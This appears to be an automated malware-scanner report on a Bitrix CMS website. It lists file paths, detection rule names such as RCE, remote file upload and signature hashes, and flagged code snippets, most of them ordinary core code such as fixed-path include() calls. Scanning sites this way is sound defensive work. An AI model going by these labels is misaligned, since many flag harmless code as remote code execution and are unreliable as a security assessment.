/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/authorize_registration.php

Size: 6.90 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUESTEXTR_SKIP)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/authorize.php

Size: 3.79 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUESTEXTR_SKIP)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/ru/admin/site_checker.php

Size: 81.03 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Sign 471b95ee Line: 92 Dangerous

Malware Signature (hash: 471b95ee)

suhosin

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/classes/general/update_update.php

Size: 22.66 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system (in other wordsno updates may be available). If any of the module updates are availableplease install it first."; $MESS["SUP_SRC_ACT_ALT"] = "Download source code"; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_SITES_PROMT"] = "You cannot create more than #NUM# site#END# using this kernel according to your license. If you need more sites, you can buy them any time. After you have purchased the additional sites, you will have to add them to the system."; $MESS["SUP_SITES_AC...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/classes/general/update_update5.php

Size: 25.89 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system (in other wordsno updates may be available). If any of the module updates are availableplease install it first."; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_CHECK_PROMT"] = "You can create not more than #NUM# site(s) based on this kernel according to your license."; $MESS["SUP_CHECK_PROMT_2"] = "You can create an unlimited number of wesbsites using this product installation."; $MESS["SUP_CHECK_PROMT_1"] = "You can extend your period of technical support, purchase additi...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/classes/general/update_client.php

Size: 24.45 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system (in other wordsno updates may be available). If any of the module updates are availableplease install it first."; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_CHECK_PROMT"] = "You can create not more than #NUM# site(s) based on this kernel according to your license."; $MESS["SUP_CHECK_PROMT_2"] = "You can create an unlimited number of websites using this product installation."; $MESS["SUP_CHECK_PROMT_21"] = "You can add unlimited number of users for the current product co...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/admin/site_checker.php

Size: 51.25 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Sign 471b95ee Line: 92 Dangerous

Malware Signature (hash: 471b95ee)

suhosin

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/admin/update_system.php

Size: 15.12 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system (in other wordsno updates may be available). If any of the module updates are availableplease install them first."; $MESS["SUP_SUBS_BUTTON"] = "Download source code"; $MESS["SUP_SUPPORT_BUTTON"] = "Reload All Files"; $MESS["SUP_INITIAL"] = "Initialising..."; $MESS["SUP_SUBS_SUCCESS"] = "The source code has been downloaded successfully"; $MESS["SUP_SUPPORT_SUCCESS"] = "Files has been downloaded successfully."; $MESS["SUP_SUBS_MED"] = "Downloaded source code for"; $MESS["SUP_SUPPORT_MED...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/start.php

Size: 12.83 kB Created: 2017-11-21 16:20:30 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 237 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/dbconn_error.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/epilog_main_admin.php

Size: 4.07 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 44 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$siteSupport)

Exploit execution Line: 5 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/interface/lang_files.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/admin_lib.php

Size: 58.58 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 443 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/admin/.left.menu.php")

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''return strcasecmp($a["ID"], $b["ID"]);')); return $aThemes; } public static function GetCurrentTheme() { $aUserOpt CUserOptions::GetOption("global""settings"); if($aUserOpt["theme_id"] <> "") { $theme preg_replace("/[^a-z0-9_.-]/i"""$aUserOpt["theme_id"]); if($theme <> "") { return $theme; } } return ".default"; } } class CAdminUtil { public static function dumpVars($vars$arExclusions = array()) { $result ""; if (is_array($vars)) { foreach ($vars as $varN...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/prolog_main_admin.php

Size: 15.84 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 3
DescriptionMatch

Exploit execution Line: 245 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/php_interface/this_site_logo.php")

Exploit execution Line: 257 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

Exploit execution Line: 97 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$adminHeader)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/admin_list.php

Size: 38.62 kB Created: 2017-11-21 16:20:30 Modified: 2023-06-30 13:57:54 Warns: 2
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''if($a["__sort"] == $b["__sort"]) return 0; return ($a["__sort"] < $b["__sort"])? -1 : 1;')); } foreach($this->aHeaders as $id=>$arHeader) { if(in_array($id$this->arVisibleColumns)) $this->aVisibleHeaders[$id] = $arHeader; } if (isset($_REQUEST["mode"]) && $_REQUEST["mode"] == "settings"$this->ShowSettings($aAllCols$aCols$aOptions); } function ShowSettings($aAllCols$aCols$aOptions) { global $USER; require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/inclu...

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(this.form.action[this.form.action.selectedIndex].getAttribute('custom_action'));return false;}" disabled="disabled" class="adm-table-action-button" />
<? endif; ?>
    <span class="
adm-table-counter" id="<?=$this->table_id?>_selected_count"><?=GetMessage('admin_lib_checked')?>: <span>0</span></span>
<? endif; ?>
</div>
<? } public function DisplayList($arParams = array()) { $menu = new CAdminPopup($this->table_id."_menu"$this->table_id."_menu"); $menu->Show(); if( (isset($_REQUEST['ajax_debu...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/prolog_auth_admin.php

Size: 2.90 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 61 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/epilog_jspopup_admin.php

Size: 221.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 5 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/interface/lang_files.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/epilog_auth_admin.php

Size: 1.56 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 7 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/interface/lang_files.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/lang_files.php

Size: 3.48 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 72 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$NEW_LANGS[$i])

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/auth/wrapper.php

Size: 5.87 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 128 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$siteSupport)

Exploit execution Line: 68 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/interface/auth/wrapper_auth_result.php")

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/probki/index.php

Size: 98.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/probki/lang/ru/exec/index.php')

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/probki/.parameters.php

Size: 102.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/probki/lang/ru/exec/.parameters.php')

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/probki/.description.php

Size: 142.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/probki/lang/ru/exec/.description.php')

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/admin_security/index.php

Size: 4.50 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 40 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/security/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/weather/index.php

Size: 99.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/weather/lang/ru/exec/index.php')

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/weather/.parameters.php

Size: 103.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/weather/lang/ru/exec/.parameters.php')

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/weather/.description.php

Size: 143.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/weather/lang/ru/exec/.description.php')

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/weather/city.php

Size: 96.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/weather/lang/ru/exec/city.php')

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/admin_info/index.php

Size: 2.18 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 6 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

/var/www/kievflotq/kievflot.ua/bitrix/tools/vote/vote_chart.php

Size: 448.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 10 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/".$file)

/var/www/kievflotq/kievflot.ua/bitrix/managed_cache/MYSQL/e5/e56397d99b3a76ae3f02219877fed2c7.php

Size: 13.32 kB Created: 2024-03-04 15:30:54 Modified: 2024-03-04 15:30:54 Dangers: 1
DescriptionMatch

Sign b236d073 Line: 5 Dangerous

Malware Signature (hash: b236d073)

/*;*/

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/lib/entity/query.php

Size: 75.80 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->is_executing true$query $this->buildQuery(); $cacheId ""$ttl 0$result null; if($this->cacheTtl && (empty($this->join_map) || $this->cacheJoins == true)) { $ttl $this->entity->getCacheTtl($this->cacheTtl); } if($ttl 0) { $cacheId md5($query); $result $this->entity->readFromCache($ttl$cacheId$this->countTotal); } if($result === null) { $result $this->query($query); if($ttl 0) { $result $this->entity->writeToCache($result$cacheId$this->count...

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/lib/composite/responder.php

Size: 18.28 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 650 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/cluster/memcache.php")

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/include.php

Size: 22.67 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Sign 99fc3b9d Line: 101 Dangerous

Malware Signature (hash: 99fc3b9d)

$GLOBALS['____

Sign d97f004d Line: 101 Dangerous

Malware Signature (hash: d97f004d)

ZGVmaW5l

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/classes/general/user.php

Size: 138.93 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 4767 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path)

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/classes/general/controller_member.php

Size: 41.85 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 1076 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST['parameters'])

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($disconnect_command); COption::SetOptionString("main""controller_member""N"); } public static function GetBackup($bRefresh false) { static $arCachedData; if(!isset($arCachedData) || $bRefresh$arCachedData unserialize(COption::GetOptionString("main""~controller_backup""")); return $arCachedData; } public static function SetBackup($arBackup) { COption::SetOptionString("main""~controller_backup"serialize($arBackup)); CControllerClient::GetBackup(true); } public static functio...

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/admin/user_admin.php

Size: 23.85 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 69 Warning

Double var technique is usually used for the obfuscation of malicious code

${$f}

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/tools.php

Size: 166.27 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 2
DescriptionMatch

Exploit download_remote_code2 Line: 3342 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($fp"Host: ".$_SERVER["HTTP_HOST"]."\nDate: ".date("Y-m-d H:i:s")

Exploit execution Line: 3742 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/countries.php")

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(ua) != null)
                        {
                            
rv parseFloat(RegExp.$1);
                        }
                    }
                    else if (
n.appName == "Netscape")
                    {
                        
rv 11;
                        
re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");
                        if (
re.exec(ua) != null)
                        {
                            
rv parseFloat(RegExp.$1);
                        }
                    }
                }

                return 
rv;
            }

        })(
windowdocumentnavigator);
JS;
return 
'<script type="text/javascript" data-skip-moving="true">'.str_replace(array("\n""\t"), ""$js)."</script>"; } public static function GetScrip...

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/install/gadgets/bitrix/admin_security/index.php

Size: 4.50 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 40 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/security/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/coupon_activation.php

Size: 16.58 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:42 Dangers: 1
DescriptionMatch

Exploit execution Line: 148 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/bitrix/catalog/catalog/section.php

Size: 2.36 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Dangers: 1
DescriptionMatch

Exploit execution Line: 75 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/".$this->GetFolder()

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/main_beta/tinymce/plugins/jbimages/ci/system/core/Loader.php

Size: 29.86 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('?>'.preg_replace("/;*\s*\?>/""; ?>"str_replace('<?=''echo 'file_get_contents($_ci_path)))); } else { include($_ci_path); } log_message('debug''File loaded: '.$_ci_path); if ($_ci_return === TRUE) { $buffer ob_get_contents(); @ob_end_clean(); return $buffer; } if (ob_get_level() > $this->_ci_ob_level 1) { ob_end_flush(); } else { $_ci_CI->output->append_output(ob_get_contents()); @ob_end_clean(); } } protected function _ci_load_class($class$params NULL$object_name ...

Sign 11413268 Line: 829 Dangerous

Malware Signature (hash: 11413268)

eval('?>

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/main_beta/tinymce/plugins/jbimages/ci/system/core/Input.php

Size: 17.89 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 720 Dangerous

Malware Signature (hash: 11413268)

exploit

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/main_beta/tinymce/plugins/jbimages/ci/system/libraries/Image_lib.php

Size: 36.47 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($cmd$output$retval); if ($retval 0) { $this->set_error('imglib_image_process_failed'); return FALSE; } @chmod($this->full_dst_pathFILE_WRITE_MODE); return TRUE; } function image_process_netpbm($action 'resize') { if ($this->library_path == '') { $this->set_error('imglib_libpath_invalid'); return FALSE; } switch ($this->image_type) { case $cmd_in 'giftopnm'$cmd_out 'ppmtogif'; break; case $cmd_in 'jpegtopnm'$cmd_out 'ppmtojpeg'; break; case $cmd_in 'pngtop...

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/main_beta/tinymce/plugins/jbimages/ci/system/libraries/Upload.php

Size: 26.90 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 2
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($cmd$mime$return_status); if ($return_status === && is_string($mime) && preg_match($regexp$mime$matches)) { $this->file_type $matches[1]; return; } } if ( (bool) @ini_get('safe_mode') === FALSE && function_exists('shell_exec')) { $mime = @shell_exec($cmd); if (strlen($mime) > 0) { $mime explode("\n"trim($mime)); if (preg_match($regexp$mime[(count($mime) - 1)], $matches)) { $this->file_type $matches[1]; return; } } } if (function_exists('popen')) { $proc = @popen($cmd'r...

Function shell_exec Warning

Potentially dangerous function `shell_exec`

[https://www.php.net/shell_exec]

shell_exec($cmd); if (strlen($mime) > 0) { $mime explode("\n"trim($mime)); if (preg_match($regexp$mime[(count($mime) - 1)], $matches)) { $this->file_type $matches[1]; return; } } } if (function_exists('popen')) { $proc = @popen($cmd'r'); if (is_resource($proc)) { $mime = @fread($proc512); @pclose($proc); if ($mime !== FALSE) { $mime explode("\n"trim($mime)); if (preg_match($regexp$mime[(count($mime) - 1)], $matches)) { $this->file_type $matches[1]; return; } } } } } if (funct...

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/to_delete/tinymce/plugins/jbimages/ci/system/core/Loader.php

Size: 29.86 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('?>'.preg_replace("/;*\s*\?>/""; ?>"str_replace('<?=''echo 'file_get_contents($_ci_path)))); } else { include($_ci_path); } log_message('debug''File loaded: '.$_ci_path); if ($_ci_return === TRUE) { $buffer ob_get_contents(); @ob_end_clean(); return $buffer; } if (ob_get_level() > $this->_ci_ob_level 1) { ob_end_flush(); } else { $_ci_CI->output->append_output(ob_get_contents()); @ob_end_clean(); } } protected function _ci_load_class($class$params NULL$object_name ...

Sign 11413268 Line: 829 Dangerous

Malware Signature (hash: 11413268)

eval('?>

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/to_delete/tinymce/plugins/jbimages/ci/system/core/Input.php

Size: 17.89 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 720 Dangerous

Malware Signature (hash: 11413268)

exploit

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/to_delete/tinymce/plugins/jbimages/ci/system/libraries/Image_lib.php

Size: 36.47 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($cmd$output$retval); if ($retval 0) { $this->set_error('imglib_image_process_failed'); return FALSE; } @chmod($this->full_dst_pathFILE_WRITE_MODE); return TRUE; } function image_process_netpbm($action 'resize') { if ($this->library_path == '') { $this->set_error('imglib_libpath_invalid'); return FALSE; } switch ($this->image_type) { case $cmd_in 'giftopnm'$cmd_out 'ppmtogif'; break; case $cmd_in 'jpegtopnm'$cmd_out 'ppmtojpeg'; break; case $cmd_in 'pngtop...

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/to_delete/tinymce/plugins/jbimages/ci/system/libraries/Upload.php

Size: 26.90 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 2
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($cmd$mime$return_status); if ($return_status === && is_string($mime) && preg_match($regexp$mime$matches)) { $this->file_type $matches[1]; return; } } if ( (bool) @ini_get('safe_mode') === FALSE && function_exists('shell_exec')) { $mime = @shell_exec($cmd); if (strlen($mime) > 0) { $mime explode("\n"trim($mime)); if (preg_match($regexp$mime[(count($mime) - 1)], $matches)) { $this->file_type $matches[1]; return; } } } if (function_exists('popen')) { $proc = @popen($cmd'r...

Function shell_exec Warning

Potentially dangerous function `shell_exec`

[https://www.php.net/shell_exec]

shell_exec($cmd); if (strlen($mime) > 0) { $mime explode("\n"trim($mime)); if (preg_match($regexp$mime[(count($mime) - 1)], $matches)) { $this->file_type $matches[1]; return; } } } if (function_exists('popen')) { $proc = @popen($cmd'r'); if (is_resource($proc)) { $mime = @fread($proc512); @pclose($proc); if ($mime !== FALSE) { $mime explode("\n"trim($mime)); if (preg_match($regexp$mime[(count($mime) - 1)], $matches)) { $this->file_type $matches[1]; return; } } } } } if (funct...